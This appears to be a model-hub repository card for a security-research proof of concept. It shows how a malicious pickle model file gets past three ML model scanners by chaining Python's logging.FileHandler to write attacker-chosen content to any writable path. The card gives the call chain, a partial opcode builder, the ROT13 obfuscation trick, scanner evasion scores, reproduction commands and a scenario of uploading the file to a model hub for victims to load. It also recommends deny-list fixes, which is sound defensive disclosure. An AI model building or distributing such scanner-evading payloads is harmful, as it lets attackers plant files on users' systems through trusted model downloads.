This repository contains a proof-of-concept exploit payload for security research purposes. Access to the pickle payload and PoC code requires acknowledgement of responsible use. By requesting access, you confirm you are a security researcher, penetration tester, or student using this material for defensive/educational purposes only.

logging.FileHandler.emit: File Write via stdlib Logging

Security Research / Responsible Disclosure: This repository is part of a systematic study of pickle scanner bypass techniques. The payload demonstrates a detection gap in ML model security scanners. Access to malicious_model.pkl and poc.py requires an access request; see the note above.

Summary

Scanner scores for malicious_model.pkl:

Scanner             CRITICAL   WARNING   Bypassed?
modelaudit 0.2.37   0          6         Yes (0 CRITICAL)
picklescan 1.0.4    0          0         Yes
modelscan           0          0         Yes

Vulnerability

logging.FileHandler.emit(handler, record) writes LogRecord.msg to the handler's file. By constructing a FileHandler with an attacker-controlled path and a LogRecord with an attacker-controlled msg, arbitrary content can be written to any path the process can write to.

None of the logging primitives used here appear on any scanner's deny list. The file content is ROT13-encoded inside the pickle; _codecs.encode, which scanners allow-list (SAFE_GLOBALS), decodes it at runtime.
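
In plain Python, the call chain the payload encodes is equivalent to the following sketch (the message content here is illustrative; the unbound-method form mirrors how the pickle invokes each step):

import logging

handler = logging.FileHandler("/tmp/scanner_bypass_proof.txt")
logging.FileHandler.setFormatter(handler, logging.Formatter("%(message)s"))
record = logging.LogRecord("root", logging.INFO, "", 0, "attacker-chosen content", None, None)
logging.FileHandler.emit(handler, record)   # writes record.msg through the formatter
logging.FileHandler.close(handler)          # flush to disk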


Proof of Concept

malicious_model.pkl in this repository is the exploit payload. poc.py builds the payload and tests it, printing full scanner output.

How the PoC was built

import codecs

def build(target: str, content: str) -> bytes:
    content_rot13 = codecs.encode(content, "rot_13")

    ops = bytearray(b"\x80\x04")  # PROTO 4

    # _codecs.encode(rot13_content, 'rot_13') → content  [0 findings]
    ops += sg("_codecs", "encode") + sbu(content_rot13) + sbu("rot_13") + b"\x86R"  # TUPLE2, REDUCE
    ops += b"\x94\x30"  # MEMOIZE (memo[0]), POP
    # ... remaining opcodes assemble the logging call chain (see poc.py)

Affected file formats

Pickle (.pkl, .pt, .bin, .joblib): any file deserialized via pickle.loads(), torch.load(), joblib.load(), or an equivalent loader.

Conditions required to trigger

  1. Target calls pickle.loads(untrusted_bytes) or loads a model file via any pickle-based loader (see the sketch after this list)
  2. The scanner performs static analysis only (no sandboxed execution)
  3. Scanner checks GLOBAL/STACK_GLOBAL opcodes against a deny list
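
For condition 1, any pickle-based loader suffices; a minimal sketch of the vulnerable pattern:

import pickle

# Deserialization executes the payload's opcodes; the side effect fires
# before loads() even returns.
with open("malicious_model.pkl", "rb") as f:
    obj = pickle.loads(f.read())

# torch.load("malicious_model.pkl") and joblib.load("malicious_model.pkl")
# reach the same pickle machinery and are equally affected.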

Reproduction Steps

# 1. Request access above, then clone
git clone https://huggingface.co/SiggytheShark/pickle-bypass-logging-filehandler-emit
cd pickle-bypass-logging-filehandler-emit

# 2. Install requirements
pip install modelaudit picklescan modelscan

# 3. Scan: observe that each scanner's scores match the table above
modelaudit scan malicious_model.pkl
picklescan --path malicious_model.pkl
modelscan -p malicious_model.pkl

# 4. Execute to confirm the side effect (file write)
python3 poc.py

# 5. Verify
ls /tmp/scanner_bypass_proof.txt

Security Impact

Add "logging.FileHandler" and "logging.LogRecord" to ALWAYS_DANGEROUS_FUNCTIONS. No model should access the logging system during deserialization.

Bypass mechanism: The payload evades static analysis while achieving its effect (here, an arbitrary file write) as soon as pickle.loads() is called.

Real-world scenario: An attacker uploads this payload to a model hub. A victim downloads and loads it. The scanner reports the file as safe (0 CRITICAL). The payload fires silently: the return value of pickle.loads() looks like a normal Python object, while the side effect has already occurred.
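
From the victim's side, assuming the payload's target path from the reproduction steps, this looks like:

import pickle

with open("malicious_model.pkl", "rb") as f:
    obj = pickle.loads(f.read())
print(repr(obj))  # an ordinary-looking object; nothing signals the write

# ...yet the side effect has already happened:
print(open("/tmp/scanner_bypass_proof.txt").read())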


Full Technical Writeup

logging.FileHandler.emit: File Write via stdlib Logging

Score: 0 CRITICAL, 6 WARNING
Technique: Arbitrary file write via the logging module's ordinary public API
Scanner version: modelaudit 0.2.37

Mechanism

logging.FileHandler.emit(handler, record) writes LogRecord.msg to the handler's file. By constructing a FileHandler with an attacker-controlled path and a LogRecord with an attacker-controlled msg, arbitrary content can be written to any path the process can write to.

None of the logging primitives used here appear on any scanner's deny list. The file content is ROT13-encoded inside the pickle; _codecs.encode, which scanners allow-list (SAFE_GLOBALS), decodes it at runtime.

Pickle Structure

_codecs.encode(rot13_content, 'rot_13')            → content             [0 findings]
logging.FileHandler(target)                        → handler             [WARNING 1]
logging.Formatter('%(message)s')                   → formatter           [WARNING 2]
logging.FileHandler.setFormatter(handler, fmt)     → configure handler   [WARNING 3]
logging.LogRecord('root', 20, '', 0, content, ...) → log record          [WARNING 4]
logging.FileHandler.emit(handler, record)          → file written        [WARNING 5]
logging.FileHandler.close(handler)                 → flush               [WARNING 6]
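
The opcode-level claims above can be checked with the stdlib disassembler; the only globals in the stream should be _codecs.encode and the logging.* names listed:

import pickletools

with open("malicious_model.pkl", "rb") as f:
    pickletools.dis(f.read())  # inspect the STACK_GLOBAL entries in the output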

Why This Is Notable

This demonstrates that even clearly "benign" stdlib modules like logging can be weaponized via their ordinary public API. The logging module has no reason to appear in a model pickle, yet it provides a fully functional file-write primitive with no dangerous function names.

The higher warning count (6 WARNING, versus 2 for the pathlib.write_text technique) makes this less attractive as a primary technique, but it illustrates the surface-area problem.

Recommended Fix

Add "logging.FileHandler" and "logging.LogRecord" to ALWAYS_DANGEROUS_FUNCTIONS. No model should access the logging system during deserialization.


General Analysis: Security Research
